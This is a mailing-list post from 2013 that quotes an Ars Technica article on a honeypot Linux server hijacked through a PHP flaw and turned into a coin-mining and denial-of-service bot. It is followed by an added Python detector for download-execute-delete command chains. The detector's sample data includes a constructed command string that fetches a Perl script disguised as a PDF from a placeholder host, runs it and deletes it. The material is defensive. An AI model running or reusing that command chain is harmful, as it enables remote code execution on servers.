NYLXS Mailing Lists and Archives
NYLXS Members have a lot to say and share but we don't keep many secrets. Join the Hangout Mailing List and say your piece.


MESSAGE
DATE 2013-12-17
FROM Ruben Safir
SUBJECT [NYLXS - HANGOUT] hacked linux boxes
http://arstechnica.com/security/2013/12/anatomy-of-a-hack-what-a-successful-exploit-of-a-linux-server-looks-like/


What a successful exploit of a Linux server looks like
How one box was converted into a Bitcoin-mining, DoS-spewing,
bug-exploiting bot.

by Dan Goodin - Dec 17 2013, 3:15pm EST


Like most mainstream operating systems these days, fully patched
installations of Linux provide a level of security that requires a fair
amount of malicious hacking to overcome. Those assurances can be
completely undone by a single unpatched application, as Andre' DiMino
demonstrated when he documented an Ubuntu machine in his lab being
converted into a Bitcoin-mining, denial-of-service-spewing,
vulnerability-exploiting hostage under the control of attackers.

A security researcher with George Washington University, DiMino noticed
several IP addresses attempting to hijack the Linux server by exploiting
a now-patched PHP flaw that gave attackers the ability to remotely
execute commands on vulnerable machines. DiMino was curious to know what
the people behind the attacks intended to do with his machine, so he set
up a "honeypot" box that, for research purposes, ran an older version of
the Web development language.

The attackers' HTTP POST request contained a variety of commands that in
short order downloaded a Perl script that was disguised as a PDF
document file, executed it, and then deleted it. To ensure success, the
attackers repeated the steps using curl, fetch, and lwp-get requests. The
Perl script was programmed to sleep for periods of time, presumably to
prevent administrators from noticing anything amiss. Eventually, the
compromised machine connected to an Internet relay chat channel, where
it downloaded another script and executed it. Then he ran forensic
software and snapped lots of screen shots so everyone could follow
along.

In short order, the machine was running a host of apps installed by the
attackers. Some of them hijacked the server hardware to perform the
mathematical operations required to "mine" Bitcoins and another digital
currency known as Primecoin. The server was also equipped with apps to
perform denial-of-service attacks on other machines and to scan other
machines for known vulnerabilities and exploit them when found.

"Across my honeypots, I'll see dozens of these a day, including Linux
ELF [executable and linkable format] files, perlbots, and vintage
shells," DiMino wrote in a blog post published Tuesday. "While these
injected perl and shell scripts are typically considered the patio gnats
of the Internet, more annoying than anything else, they do have the
potential to cause considerable harm."

Not just for Windows anymore

DiMino's anatomy lesson is a graphic demonstration of recent advances in
exploits for Linux. Once primarily the domain of machines running
Windows, point-and-click exploits are used to commandeer machines so
attackers can use them in online crime schemes. The increased horsepower
and bandwidth available in many Linux servers often makes them more
attractive than personal computers running Microsoft OSes. And as has
always been the case, hijacked bots don't come with expensive
electricity bills, and they often make it easy for criminals to cover
their tracks.

The takeaway from the demonstration is just how important it is for
admins working with any OS to stay on top of security patching. DiMino
counsels admins to go a step further by learning how to actively monitor
network activity on the machines they watch over. His blog post provides
instructions for using the Volatility software framework to perform
forensics on server memory. Among other things, it allows users to
identify remote connections and the processes that initiate them.

"Besides ensuring that Internet facing servers are properly patched and
hardened, knowing how to quickly track such a compromise should be part
of best practices," DiMino wrote.
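
Added example (not part of the original post or the quoted article): a Python check that flags the download, execute, delete chain the article describes when it appears in a decoded POST body captured by a honeypot or web server. The function name, the sample bodies and host names, the extension list, and the inclusion of wget and lwp-download alongside the tools the article names are assumptions made for illustration.

```python
import re
import shlex
from posixpath import basename

# curl, fetch and lwp-get come from the article; wget and lwp-download are assumed.
DOWNLOADERS = {"wget", "curl", "fetch", "lwp-get", "lwp-download"}
INTERPRETERS = {"perl", "sh", "bash", "python", "php"}
DOC_EXT = re.compile(r"\.(pdf|jpg|jpeg|png|gif|txt|doc)$", re.I)  # assumed list

def analyze_body(body):
    """Return findings for one decoded POST body (a string of shell commands)."""
    fetched, executed, deleted, tools = set(), set(), set(), set()
    for cmd in re.split(r"&&|\|\||[;|\n]", body):
        try:
            words = shlex.split(cmd)
        except ValueError:              # unbalanced quotes: split on whitespace
            words = cmd.split()
        if not words:
            continue
        prog = basename(words[0])
        # File names: every non-option argument, reduced to its last path part.
        names = {basename(w.split("?")[0]) for w in words[1:] if not w.startswith("-")}
        names.discard("")
        if prog in DOWNLOADERS:
            tools.add(prog)
            fetched |= names
        elif prog in INTERPRETERS:
            executed |= names
        elif prog == "rm":
            deleted |= names
    chain = sorted(fetched & executed & deleted)
    return {
        "chain_files": chain,           # fetched, run and removed in one request
        "disguised": [f for f in chain if DOC_EXT.search(f)],
        "downloaders_tried": sorted(tools),
        "suspicious": bool(chain),
    }

SAMPLES = [
    # Constructed: one script fetched three ways, run with perl, then deleted.
    "cd /tmp; wget http://files.example.invalid/a.pdf; perl a.pdf; rm -rf a.pdf; "
    "curl -O http://files.example.invalid/a.pdf; perl a.pdf; rm -rf a.pdf; "
    "fetch http://files.example.invalid/a.pdf; perl a.pdf; rm -rf a.pdf",
    # Constructed: ordinary form submission that merely mentions a PDF.
    "name=alice&comment=see+the+attached+report.pdf",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(analyze_body(body))
```

The check compares file names only and ignores command order, so treat a hit as a lead for review rather than a verdict.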
